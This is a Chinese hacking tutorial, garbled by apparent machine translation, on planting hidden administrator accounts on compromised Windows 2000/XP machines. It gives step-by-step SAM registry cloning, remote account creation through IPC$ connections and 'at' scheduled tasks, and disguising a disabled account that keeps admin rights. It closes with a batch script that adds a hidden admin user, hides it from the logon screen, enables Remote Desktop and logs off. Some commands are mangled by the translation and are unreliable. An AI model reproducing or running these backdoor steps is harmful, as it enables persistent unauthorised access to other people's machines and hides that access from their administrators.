圖形界面適用於3389終端服務的本地或肉雞。上面提到的作者所說的方法很好,但是比較復雜。將使用psu.exe(壹個允許程序作為系統用戶運行的程序),如果它在肉雞上,它將被上傳到psu.exe。我說過這個方法不會用到psu.exe程序。因為windows2000有兩個註冊表編輯器:regedit.exe和regedt32.exe。XP中的Regedit.exe和regedt32.exe實際上是壹個程序。修改鍵值的權限時,右鍵“權限”進行修改。我想每個人都熟悉regedit.exe,但是妳不能在註冊表的鍵上設置權限。regedt32.exe最大的優點是妳可以在註冊表的鍵上設置權限。nt/2000/xp的賬號信息在註冊表的HKEY_LOCAL_MACHINE\SAM\SAM key下,但是其他用戶都沒有權限查看裏面的信息,所以我先用regedt32.exe的SAM key為我設置了“完全控制”權限。這樣妳就可以讀寫SAM鍵裏的信息了。具體步驟如下:
1.假設我們以超級用戶管理員的身份用終端服務登錄肉雞。首先,我們在命令行下或者在賬戶管理器中設置壹個賬戶:hacker$。在這裏,我在命令行下設置了這個帳戶。
網絡用戶黑客$ 1234 /add
2.在“開始/運行”中,輸入:regedt32.exe,然後按enter運行regedt32.exe。如圖所示:t001
3.點擊權限,彈出如下窗口:t002。
當我登錄到安全欄時,單擊“添加”添加帳戶。這裏我以管理員身份登錄,所以我將添加管理員,並將權限設置為“完全控制”。這裏需要說明壹下:最好添加賬號或者賬號所屬的群,千萬不要修改原來的賬號或者群,否則會帶來壹系列不必要的問題。當隱藏的超級用戶建立後,到這裏刪除妳添加的帳戶。
4.點擊“開始”→“運行”,輸入“regedit.exe”啟動註冊表編輯器regedit.exe。
open key:HKEY _ local _ mai Chine \ Sam \ Sam \ domains \ account \ user \ names \ hacker $ "如圖:t003。
5.將項目hacker$,00000409,000001F4導出為hacker.reg,409.reg,1f4.reg,使用記事本分別編輯這些導出的文件,並復制超級用戶對應的項目00001F4下的鍵“f”的值。如圖t004所示。
編輯後的hacker.reg如下圖所示:
6.在命令行執行net user hacker$ /del來刪除用戶hacker$: net user hacker$ /del。
7.在regedit.exe的窗口中按F5刷新,然後點擊文件-導入註冊表文件,將修改後的hacker.reg導入註冊表。
8.至此,隱藏的超級用戶hacker$已經建成,然後regedit.exe關閉。在regedt32.exe窗口中,將HKEY_LOCAL_MACHINE\SAM\SAM key的權限改回原來的樣子(只需刪除添加的賬戶管理員即可)。
9.註意:隱藏的超級用戶建立後,在賬戶管理器中看不到黑客$了,也不能在命令行使用“net user”命令,但是超級用戶建立後,就不能修改密碼了。如果使用net user命令更改hacker$的密碼,將會在帳戶管理器中再次看到隱藏的超級用戶,並且無法刪除。
二、如何在命令行下遠程建立隱藏超級用戶?
這裏會用到At的命令,因為at生成的計劃任務是作為壹個系統運行的,所以不需要psu.exe程序。為了能夠使用at命令,肉雞必須具有計劃服務。如果沒有,可以用netsvc.exe或sc.exe帶來的工具遠程啟動。當然,也可以使用該方法,只要可以啟動日程服務。
對於命令行模式,可以使用各種連接方式,比如用SQLexec連接MSSQL端口1433,或者使用telnet服務,只要能得到cmdshell,有權限運行at命令即可。
1,先找個肉雞,至於怎麽找,那不是我這裏說的話題。假設我們找到了壹個肉雞,其超級用戶是管理員,密碼是12345678。現在我們開始在命令行下為它遠程建立壹個隱藏的超級用戶。(示例中的主機是我的局域網中的主機。我把它的ip地址改成了13.50.97.238。請不要在網上簽到,以免幹擾正常的ip地址。)
2.首先與肉雞建立連接,命令為:net use \ 13 . 50 . 97 . 238 \ IPC $ " 12345678 "/用戶:"管理員。
3.使用at命令在肉雞上建立壹個用戶(如果沒有啟動at服務,可以通過小榮的netsvc.exe或sc.exe遠程啟動):at 13 . 50 . 97 . 238 12:51 C:\ win nt \ system32 \ net.exe user hacker $ 660。
創建帶有$符號的用戶名是因為在添加$符號後,在命令行中使用net user將不會顯示該用戶,但是可以在帳戶管理器中看到該用戶。
4.還可以使用at命令導出HKEY本地機器\薩姆\薩姆\域\帳戶\用戶下的鍵值:at \ 13 . 50 . 97 . 238 12:55c:\ win nt \ regedit.exe/ehacker.reg.
/e是regedit.exe的參數,HKEY _本地_機器\ Sam \ Sam \ domains \ account \ users \中的鍵必須以\結尾。如果需要,可以用引號將“c:\ win nt \ regedit.exe/ehacker.reghkey _本地_機器\ Sam \ Sam \ domains \ account \ users”括起來。
5.將肉雞上的hacker.reg下載到本機,用記事本打開進行編輯。命令是:copy \ 13 . 50 . 97 . 238 \ admin $ \ system32 \ hacker . reg c:\ hacker . reg。
修改的方法在圖形界已經介紹過了,這裏就不介紹了。
6.將編輯好的hacker.reg復制回肉雞。復制C:\ hacker . reg \ 13 . 50 . 97 . 238 \ admin $ \ system32 \ hacker 1 . reg。
上述步驟總結如下:
7.檢查肉雞時間:net time \13.50.97.238然後使用at命令刪除用戶hacker$:
at \ 13 . 50 . 97 . 238 13:40網絡用戶黑客$ /del
8.驗證hacker$是否被刪除:使用
與肉雞斷開連接。
net use \ 13 . 50 . 97 . 238 \ IPC $ " 1234 "/用戶:“hacker$”用帳號hacker $,連接肉雞,表示已經刪除。
11.重新驗證用戶hacker$是否有讀寫和刪除的權限。如果不放心,也可以核實是否可以建立其他賬戶。
12,通過圖1,2,3可以得出用戶hacker$擁有超級用戶權限,因為壹開始我使用at命令將其建立為普通用戶,而現在我擁有遠程讀寫刪除權限。
3.肉雞不開3389終端服務,不想用命令行怎麽辦?
在這種情況下,您還可以使用界面為肉雞遠程建立壹個隱藏的超級用戶。因為regedit.exe和regedt32.exe都有連接到網絡註冊表的功能,所以您可以使用regedt32.exe為遠程主機的註冊表項設置權限,使用regedit.exe編輯遠程註冊表。帳戶管理器還具有連接到另壹臺計算機的功能。您可以使用帳戶管理器創建和刪除遠程主機的帳戶。具體步驟和上面描述的差不多,就不多說了,只說它的速度實在是讓人無法忍受。
不過有兩個前提條件:1,先用net use \肉雞ip\ipc$ "password" /user:"超級用戶名"建立與遠程主機的連接,然後用regedit.exe regedt32.exe和賬戶管理器連接遠程主機。
2.遠程主機必須打開遠程註冊服務(如果沒有,您也可以遠程打開它,因為您有超級用戶的密碼)。
第四,使用禁用的帳戶建立隱藏的超級用戶:
我們可以在肉雞上使用禁止用戶來創建隱藏的超群用戶。該方法如下:
1.盡量找出哪些用戶被細心的管理員禁止了。壹般情況下,壹些管理員出於安全考慮通常會禁用guest,當然也會禁用其他用戶。在圖形界面中,非常容易,只要在賬戶管理器中可以看到禁用賬戶上有壹個紅叉;命令行下,還沒想好辦法。我只能使用命令行下的“net user username”命令,逐個檢查用戶是否被禁用。
2.這裏,我們假設用戶hacker被管理員禁用。首先我用小容的超群用戶克隆程序clone將禁用用戶hacker克隆成超級用戶(克隆後禁用用戶hacker會自動激活):CA.EXE \肉雞ip管理員超級用戶密碼hacher hacher密碼。
3.如果您現在有壹個cmdshell,例如通過telnet服務或SQLEXEC連接肉雞的msSQL的缺省端口1433獲得的shell,您只需輸入命令:
Net用戶黑客/active:沒有這樣用戶黑客就被禁用了(至少表面上是這樣)。當然,妳也可以將用戶hacker改為其他禁用用戶。
4.這時,如果妳看壹下圖形界面下的賬戶管理器中的用戶,妳會發現用戶黑客被禁用了,但事實真的是這樣嗎?能不能把肉雞和這個殘疾用戶連起來,看能不能連上?使用命令:net用戶\肉雞ip\ipc$ "黑客密碼"/用戶:"黑客"來看看。我可以告訴妳,經過多次實驗,我每次都能成功,而且也是超級用戶權限。
5.沒有cmdshell怎麽辦?妳可以用我上面介紹的at命令禁用用戶黑客;命令格式:at \肉雞ip時間網用戶黑客/活躍:否
6.原理:具體深刻的原理我說不出來,只能從最簡單的說。如果妳在圖形界面的賬戶管理器中禁用超級用戶管理員,肯定會彈出壹個對話框,禁止妳繼續禁用超級用戶管理員。同樣,克隆時,註冊表中hacker的“f”鍵被註冊表中超級用戶administrator的“f”鍵替換。所以黑客擁有超級用戶權限,但由於註冊表中的“c”鍵仍然是原來的“c”鍵,黑客仍然會被禁用,但其超級用戶權限不會被禁用,所以被禁用的用戶黑客仍然可以連接肉雞,仍然擁有超級用戶權限。具體不太懂,那就來了解壹下吧。
動詞 (verb的縮寫)幾個註意事項:
1.隱藏的超級用戶建立後,在賬戶管理器或命令行下看不到這個用戶,但是這個用戶是存在的。
2.隱藏超級用戶建立後,密碼不能更改,因為壹旦更改密碼,隱藏超級用戶就會暴露在帳號管理器中,無法刪除。
3.在這臺電腦上測試的時候,最好用系統自帶的備份工具來備份這臺電腦的“系統狀態”,主要是註冊表的備份,因為我做實驗的時候有壹個現象,就是在賬戶管理器裏看不到任何用戶或者組,但是確實存在。還好我有備份,呵呵。SAM key畢竟是系統中最敏感的部分。
4.這個方法在2000/XP上通過了測試,但在NT上沒有通過。此方法僅供研究。請不要用這種方法進行破壞。如果這種方法造成嚴重後果,用戶負責,我不負責。
All3389xp.bat是文章的完整源代碼,功能是打開xp的3389,建立隱藏賬號。用戶名:敏敏美元,密碼:89412。
all3389xp.bat:
代碼:
回聲開放xp 3389由敏敏
@網友敏敏$ 89412 /add
@net本地組管理員敏敏$ /add
@echo Windows註冊表編輯器版本5.00 & gtc:\zm2.reg
@echo。& gt& gtc:\zm2.reg
@ echo[HKEY _ LOCAL _ MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS NT \ current version \ WINLOGON \ special accounts \ USERLIST]& gt;& gtc:\zm2.reg
@echo "敏敏$ " = dword:00000000 & gt;& gtc:\zm2.reg
@regedit /s c:\zm2.reg
@del c:\zm2.reg
@ echo REGEDIT4 & gtc:\zm.reg
@echo。& gt& gtc:\zm.reg
@ echo[HKEY _ LOCAL _ MACHINE \ SYSTEM \ current Control set \ Control \ Terminal Server]& gt;& gtc:\zm.reg
@ echo " fdenytsconnections " = dword:00000000 & gt;& gtc:\zm.reg
@ echo " Tsenabled " = dword:00000001 & gt;& gtc:\zm.reg
@regedit /s c:\zm.reg
@del c:\zm.reg
@net start termservice
@關閉-l